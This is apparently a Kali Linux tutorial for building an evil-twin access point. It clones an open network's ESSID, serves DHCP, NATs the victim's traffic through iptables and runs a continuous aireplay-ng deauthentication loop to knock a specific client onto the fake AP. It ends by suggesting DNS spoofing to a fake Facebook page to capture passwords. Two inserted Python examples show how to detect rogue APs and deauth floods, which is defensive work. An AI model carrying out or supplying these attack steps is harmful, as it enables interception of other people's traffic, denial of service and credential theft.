
Set Up an Eviltwin

When I tried to set up an evil twin for a MitM constellation in Kali 2.0, I couldn't provide internet to the victim. The origin of the problem was the brctl bridging. I have read many tutorials, but all of them were explained for BackTrack and older versions of Kali. So I was searching for a solution without using brctl, and this solution will be explained now. This will only work in unencrypted wireless environments.

Step 1 Sniff the Air

First, the victim's AP information must be observed.
Set the wifi adapter to monitor mode. There are two options to do so; I prefer these commands:
"ifconfig wlan0 down"
"iwconfig wlan0 mode monitor"
"ifconfig wlan0 up"
This is the second one:
"airmon-ng start wlan0"
If you have trouble with this, type "airmon-ng check" and maybe kill some of the PIDs, but be careful not to kill your network connection.
airmon-ng will rename your wlan0 to wlan0mon, so consider this in the following parts of the howto.
Once monitor mode is enabled, start checking the air for the APs sending their beacons:
"airodump-ng wlan0"

The last command provides the information needed to set up the fake AP:
  • BSSID of the real AP
  • channel of the real AP
  • encryption of the real AP
  • ESSID of the real AP
We pick the one with the ESSID "wireless" because it is an unencrypted AP. We can guess that this is a hotspot or a very careless user.
  • BSSID 64:7C:34:92:2B:41
  • Channel 2
  • no encryption
  • ESSID wireless
Now we start a more specific airodump to get a better overview:
"airodump-ng --bssid 64:7C:34:92:2B:41 -c 2 wlan0"
We can see in the last line that a device is already connected to this AP. The device has the MAC F8:01:13:4A:BA:D7.
Leave this terminal open with airodump running.

Step 2 Set Up DHCP-Server

To provide our fake AP with an internet connection we have to set up a DHCP server that hands the clients of the fake AP an IP address and subnet.
Check whether isc-dhcp-server is already installed. Open a new terminal and type
"dpkg -s isc-dhcp-server | grep Status"
If not:
"apt-get install isc-dhcp-server"
Now we have to configure dhcpd.conf:
"gedit /etc/dhcp/dhcpd.conf"
Add these lines at the bottom:
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0
{
        option subnet-mask 255.255.255.0;
        option broadcast-address 192.168.2.255;
        option domain-name-servers 8.8.8.8;
        option routers 192.168.2.1;
        range 192.168.2.20 192.168.2.60;
}
(indent the lines between the braces with a TAB)
The lease times set how long the handed-out IPs stay valid.
subnet and netmask define the network 192.168.2.0 - 192.168.2.255 for our fake AP. option domain-name-servers 8.8.8.8 sets Google's DNS; the rest are self-explanatory. range limits the addresses given to clients to 192.168.2.20 - 192.168.2.60, and routers is the address we will give at0 in step 4.
Save the file.

Step 3 Create the Eviltwin

Now type in the second terminal:
"airbase-ng -e wireless -c 2 wlan0"
Here we have created the evil twin AP. I did not clone the BSSID, only the ESSID.
For completeness: to clone the BSSID as well and not just the ESSID, type
"airbase-ng -e wireless -a 64:7C:34:92:2B:41 -c 2 wlan0"
but for this attack it is not really necessary, and it only confuses things while monitoring the results.
So here we started the evil twin AP, and it has the BSSID C4:E9:84:0D:9C:FA.
To monitor the connections we open a third terminal and type
"airodump-ng --bssid C4:E9:84:0D:9C:FA -c 2 wlan0"
Term1: monitors the real AP
Term2: runs the fake AP
Term3: monitors the fake AP
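From the other side of the air: the same beacon data that airodump-ng shows in step 1 is what a wireless IDS uses to spot the twin created in step 3. The script below is an added example, not part of the original post and not code from the aircrack-ng project. It assumes the defender keeps an inventory of the APs the site actually operates (the constructed INVENTORY dict) and flags an unknown BSSID advertising one of the site's ESSIDs, a known BSSID whose channel or encryption changed, and, as a fallback for the "-a" variant where the twin also copies the real BSSID, a beacon rate far above the nominal 100 TU interval. The beacon records are constructed to reproduce the post's scenario.

```python
"""Passive evil-twin detection over beacon observations.

Added example, not from the original post: it shows how a wireless IDS
would treat the airodump-ng style data the post collects in step 1 and
the twin it creates in step 3. The observations and the AP inventory
below are constructed; they reproduce the post's scenario (real AP
64:7C:34:92:2B:41, fake AP C4:E9:84:0D:9C:FA, both ESSID "wireless",
channel 2, no encryption).
"""
from collections import defaultdict
from dataclasses import dataclass

# Nominal beacon interval is 100 TU (102.4 ms), so one AP emits about
# 98 beacons per 10-second capture window.
NOMINAL_BEACONS_PER_10S = 10_000 / 102.4
DUPLICATE_FACTOR = 1.5   # heuristic: two radios on one BSSID roughly double the rate


@dataclass(frozen=True)
class Beacon:
    bssid: str
    essid: str
    channel: int
    privacy: str         # "OPN", "WPA2", ... as airodump-ng prints it


def detect_evil_twins(beacons, inventory):
    """Return (severity, message) findings for one 10-second window.

    beacons:   iterable of Beacon records
    inventory: dict ESSID -> set of (bssid, channel, privacy) for the APs
               the site actually operates (assumed to exist)
    """
    findings = []
    counts = defaultdict(int)
    seen = defaultdict(set)        # bssid -> {(essid, channel, privacy)}
    for b in beacons:
        bssid = b.bssid.upper()
        counts[bssid] += 1
        seen[bssid].add((b.essid, b.channel, b.privacy))

    for bssid, combos in seen.items():
        for essid, channel, privacy in combos:
            if essid not in inventory:
                continue           # not our network: ignore neighbours
            known = {(a.upper(), c, p) for a, c, p in inventory[essid]}
            known_bssids = {a for a, _, _ in known}
            if bssid not in known_bssids:
                findings.append(("high", f"rogue AP: {bssid} advertises our ESSID '{essid}' on ch {channel} ({privacy})"))
            elif (bssid, channel, privacy) not in known:
                findings.append(("high", f"known AP {bssid} changed settings: ch {channel}, {privacy}"))
        if len(combos) > 1:
            findings.append(("medium", f"{bssid} advertised {len(combos)} different ESSID/channel/privacy combinations"))
        if counts[bssid] > DUPLICATE_FACTOR * NOMINAL_BEACONS_PER_10S:
            findings.append(("medium", f"{bssid} sent {counts[bssid]} beacons in 10 s, about {NOMINAL_BEACONS_PER_10S:.0f} expected: possible BSSID clone"))
    return findings


REAL_AP = "64:7C:34:92:2B:41"
FAKE_AP = "C4:E9:84:0D:9C:FA"
INVENTORY = {"wireless": {(REAL_AP, 2, "OPN")}}    # constructed site inventory


def sample_window(clone_bssid=False):
    """Constructed 10-second window: the real AP, a neighbour and the twin.

    clone_bssid=True models the post's "-a" variant, where the twin also
    copies the real BSSID and only the doubled beacon rate gives it away.
    """
    twin = REAL_AP if clone_bssid else FAKE_AP
    window = [Beacon(REAL_AP, "wireless", 2, "OPN")] * 98
    window += [Beacon(twin, "wireless", 2, "OPN")] * 98
    window += [Beacon("AA:BB:CC:DD:EE:01", "neighbour", 6, "WPA2")] * 97
    return window


if __name__ == "__main__":
    for severity, message in detect_evil_twins(sample_window(), INVENTORY):
        print(f"[{severity}] {message}")
```

The inventory check is the reliable part; the beacon-rate check is a heuristic and will also fire on a busy channel where frames from a legitimate second radio are miscounted, so it is reported as medium rather than high.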
 
Step 4 Provide Internet to the Eviltwin

airbase-ng provides us with a new network interface (at0) while it is running.
"ifconfig at0"
should show some results now, so we bring it up and give it the router address from dhcpd.conf:
"ifconfig at0 up"
"ifconfig at0 192.168.2.1 netmask 255.255.255.0"
Now start the DHCP server; here it is started with the edited dhcpd.conf:
"dhcpd -cf /etc/dhcp/dhcpd.conf"
To be sure the file is loaded correctly:
"service isc-dhcp-server restart"
(The screenshot that accompanied this step showed the wrong IP address; it should be 192.168.2.1.)

Step 5 Configure Your Firewall

Last step before we go: just type these commands.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD -j ACCEPT --in-interface at0
echo 1 > /proc/sys/net/ipv4/ip_forward
They configure your firewall to NAT all traffic coming in on at0 out through eth0.
The last command tells the kernel: "act like a router and forward all traffic to its destination" (the file is ip_forward with an underscore; without it the echo fails and nothing is forwarded).

Step 6 Shoot Down the Connection

Open a fourth terminal and send deauthentication frames to the device that is connected to the real AP:
"aireplay-ng --deauth 0 -a 64:7C:34:92:2B:41 -c F8:01:13:4A:BA:D7 wlan0"
--deauth 0 means the frames are sent in an endless loop (or until we have the connection we want)
-a defines the BSSID of the AP
-c defines the MAC of the device we want to observe
We only shoot down a specific device to avoid too much attention from network flutter.
The result:

Now we can listen to all traffic of the device.
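The deauth loop in step 6 is also the loudest part of the attack from a monitoring point of view: a legitimate AP sends a handful of deauth or disassoc frames, while "--deauth 0" produces bursts of directed deauth frames every second. The detector below is an added example, not part of the original post and not aircrack-ng code. It keeps a per-(AP, client) sliding window over management frames and raises an alert when the count inside the window crosses a threshold; the frame headers, the burst size of 64 frames each way and the threshold of 10 per second are constructed assumptions. The lasting fix on the network side is 802.11w (Protected Management Frames), which makes clients drop forged deauth frames, but only where both AP and client support it.

```python
"""Deauthentication-flood detection over a stream of 802.11 frame headers.

Added example, not part of the original post. A legitimate AP sends only
occasional deauth/disassoc frames (idle timeouts, roaming); the
"aireplay-ng --deauth 0" loop in step 6 produces bursts of directed deauth
frames every second. The detector keeps a per-(AP, client) sliding window
and alerts when the count inside it crosses a threshold. The frames below
are constructed to mimic that scenario; the burst size and threshold are
assumptions, not measured values.
"""
from collections import defaultdict, deque

MGMT = 0            # 802.11 frame type: management
DATA = 2            # 802.11 frame type: data
DEAUTH = 12         # management subtype: deauthentication
DISASSOC = 10       # management subtype: disassociation
REAL_AP = "64:7C:34:92:2B:41"    # addresses from the post
CLIENT = "F8:01:13:4A:BA:D7"


class DeauthDetector:
    def __init__(self, window_s=1.0, threshold=10):
        self.window_s = window_s
        self.threshold = threshold
        self._hits = defaultdict(deque)   # (addr, addr) pair -> timestamps in window
        self.alerts = []                  # (pair, timestamp, count)

    def feed(self, ts, ftype, subtype, addr1, addr2):
        """Consume one frame header (addr1 = receiver, addr2 = transmitter).

        Returns the alert tuple when the threshold is first crossed for a
        pair inside the window, otherwise None.
        """
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            return None
        # Forged deauths are sent both AP->client and client->AP, so count
        # the address pair regardless of direction.
        pair = tuple(sorted((addr1.upper(), addr2.upper())))
        hits = self._hits[pair]
        hits.append(ts)
        while hits and ts - hits[0] > self.window_s:
            hits.popleft()
        if len(hits) == self.threshold:   # fires once per crossing
            alert = (pair, ts, len(hits))
            self.alerts.append(alert)
            return alert
        return None


def analyze(frames, **kwargs):
    """Run every (ts, type, subtype, addr1, addr2) tuple through a detector."""
    det = DeauthDetector(**kwargs)
    for frame in frames:
        det.feed(*frame)
    return det.alerts


def sample_frames():
    """Constructed capture: normal traffic, one benign deauth, then a burst."""
    frames = [(i * 0.1, DATA, 0, REAL_AP, CLIENT) for i in range(20)]
    frames.append((2.5, MGMT, DEAUTH, CLIENT, REAL_AP))   # benign idle timeout
    # Flood modelled as 64 frames AP->client then 64 client->AP, 1 ms apart
    for i in range(64):
        frames.append((5.0 + i * 0.001, MGMT, DEAUTH, CLIENT, REAL_AP))
        frames.append((5.064 + i * 0.001, MGMT, DEAUTH, REAL_AP, CLIENT))
    return sorted(frames)


if __name__ == "__main__":
    for pair, ts, count in analyze(sample_frames()):
        print(f"t={ts:.3f}s deauth flood between {pair[0]} and {pair[1]}: {count} frames in 1 s")
```

Because the single benign deauth at 2.5 s has left the one-second window by the time the burst starts, the detector fires exactly once, on the tenth frame of the burst; raising the threshold above the burst size silences it, which is the tuning knob a site adjusts against its own baseline.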

Step 7 Conclusion

These steps seem complicated for this kind of wifi hack. When you write a script for starting the DHCP server and flushing the firewall, it won't take more than 2 minutes to set up this attack. Theoretically you can write a script for the whole setup.
The profit of this attack should also be clear. When I heard of this attack my first question was: "When it's unencrypted anyway, why should I conduct this attack and not just sit within good radio range of the victim?"
Benefit 1 is that the device now gets its IP address from our DHCP server, so we are in the same network... our network (injection and so on).
Benefit 2: you can expand this attack to set up DNS spoofing, so the victim gets redirected to a fake Facebook site and we grab his password.
